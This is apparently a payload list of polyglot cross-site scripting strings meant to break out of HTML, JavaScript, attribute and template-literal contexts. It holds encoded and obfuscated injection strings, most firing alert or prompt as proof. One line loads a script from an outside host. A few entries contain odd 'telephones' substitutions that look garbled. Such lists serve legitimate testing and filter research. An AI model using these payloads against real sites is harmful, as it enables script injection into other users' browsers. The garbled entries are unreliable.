# Polyglot XSS Payloads
# Work across multiple contexts (HTML, JS, attribute, etc.)

jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcLiCk=alert() )//%%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e

'">><marquee><img src=x onerror=confirm(1)></marquee>"></plaintext\></|\><plaintext/onmouseover=prompt(1)><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->"></script><script>alert(1)</script>"><img/id="confirm&lpar;1)"/alt="/"src="/"onerror=eval(id&%23telephones;)>'"><img src="x" onerror="prompt(1)">

javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert()//>"

'">><script>alert(1)</script><marquee onstart=confirm(1)>

"onmouseover="alert(1)"style="position:absolute;width:100%;height:100%;top:0;left:0;

'><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>

"'>alert(1)</Script><Script/Src=//15telephones.NZ>

"><img src=x onerror="&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041">

';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

'-alert(1)-'
"-alert(1)-"
\'-alert(1)-\'
\"-alert(1)-\"

# Template literal injection
${alert(1)}
`${alert(1)}`
`+alert(1)+`

# Multiple context polyglot
-->]]>*/</script></style></title></textarea></noscript></template></select></xmp><!--<svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert()//'>
